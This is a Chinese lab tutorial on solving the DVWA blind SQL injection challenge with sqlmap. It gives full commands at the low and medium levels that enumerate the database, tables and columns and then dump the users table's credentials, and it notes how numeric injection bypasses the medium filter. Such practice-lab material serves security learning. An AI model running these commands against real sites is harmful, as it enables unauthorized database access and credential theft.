news 2026/5/23 9:31:47

Dvwa靶场-SQL Injection (Blind)-基于sqlmap

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Dvwa靶场-SQL Injection (Blind)-基于sqlmap

一、Low

(1)、获取数据库名

sqlmap -u "你的URL" --cookie="你的Cookie" --current-db --current-user --batch

-u "URL":这个url是你主机里的ip,如果你的靶场在虚拟机,那你就打开虚拟机,找到ip,然后加端口号,和你打开dvwa的sql盲注url差不多,只用改前面一点

--cookie:在dvwa页面--> F12 --> 应用 --> Cookie --> PHPSESSID后面的值

--current-db:获取当前网站所连接的数据库名称。

--current-user:获取当前连接数据库的用户名。

--batch (Automation)自动模式。SQLmap 在运行中会弹出很多确认选项(例如:“是否进行深度测试?”)。加上这个参数后,工具将全部选择默认(Yes),实现无人值守的自动化运行。

sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" --current-db --current-user --batch

(2)、获取表名

sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" -D dvwa --tables --batch

-D 参数用来指定你要查看的具体数据库。

--tables获取当前数据库下的表名

(3)、获取列名

sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" -D dvwa -T users --columns --batch

-T 参数用来指定具体的表名

--columns获取指定表的列名

(4)、获取具体数据(脱库)

sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" -D dvwa -T users -C "user,password" --dump --batch

-C 用来指定列名,用逗号隔开。如果不指定 -C,只用 --dump,它会把整张表全部下载下来。

二、Medium

sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/" \ --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=medium" \ --data="id=1&Submit=Submit" \ --current-db --current-user --batch

URL 变化:去掉了 URL 问号后面的参数,因为中级通过 POST 传参。

增加 --data:这是关键。--data="id=1&Submit=Submit" 告诉 sqlmap 模拟表单提交,将数据放在 HTTP 请求体中。

Cookie 级别:确保 security=medium,否则服务器会按照默认或之前的难度处理请求。

中级虽然过滤了单引号,但 id 参数在 SQL 语句中通常是数字型(如 SELECT ... WHERE id = $id)。sqlmap 会自动识别这一点并尝试数字型注入(Numeric-based Injection),这种注入方式根本不需要使用单引号,因此后端的过滤措施在中级难度下对 sqlmap 基本无效。

后面的步骤同Low

三、High

先欠着,有时间想起来这个了,再来完善它,想不起来就算了

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/7 15:58:51

实战应用:基于快马AI生成的代码,快速构建全功能在线学术期刊平台

实战应用:基于快马AI生成的代码,快速构建全功能在线学术期刊平台 最近在帮学校实验室搭建一个开源学术期刊的在线投稿系统,正好体验了InsCode(快马)平台的AI代码生成功能。整个过程比想象中顺利很多,从需求分析到可运行的原型只用…

作者头像 李华
网站建设 2026/4/1 14:50:30

NC/NCC项目补丁导出太麻烦?试试这个IDEA插件,一键搞定SQL和前端打包

用友NC/NCC项目补丁导出革命:IDEA插件全自动化解决方案实战 1. 传统补丁导出流程的痛点与变革契机 在长达八年的用友NC/NCC项目实施经历中,我见证过无数开发团队在补丁导出环节耗费大量时间却仍频繁出错的场景。记得去年参与某大型集团NCC项目时&#xf…

作者头像 李华
网站建设 2026/4/1 14:49:25

论在AI快速发展的时代,修好“内功”的重要性

绪论:纵观当下AI的发展的速度可谓是日新月异,从生成式AI到如今各种Agent智能体以及AI应用的遍地开花,仅仅只过去了两三年的时间。可见AI的迭代速度是多么快,然而在此期间我们又该何去何从呢?面对AI带来的技术变革、行业…

作者头像 李华
网站建设 2026/4/1 14:44:47

深度揭秘:foo2zjs如何让Linux打印机驱动配置变得简单高效

深度揭秘:foo2zjs如何让Linux打印机驱动配置变得简单高效 【免费下载链接】foo2zjs A linux printer driver for QPDL protocol - copy of http://foo2zjs.rkkda.com/ 项目地址: https://gitcode.com/gh_mirrors/fo/foo2zjs 在Linux的世界里,打印…

作者头像 李华
网站建设 2026/4/1 14:43:57

Ollama助力Llama-3.2-3B落地:快速部署教程与实用功能体验分享

Ollama助力Llama-3.2-3B落地:快速部署教程与实用功能体验分享 1. 引言 在当今AI技术快速发展的背景下,大型语言模型(LLM)已成为技术创新的重要驱动力。Meta推出的Llama系列模型因其开源特性在开发者社区广受欢迎,而最新发布的Llama-3.2-3B版…

作者头像 李华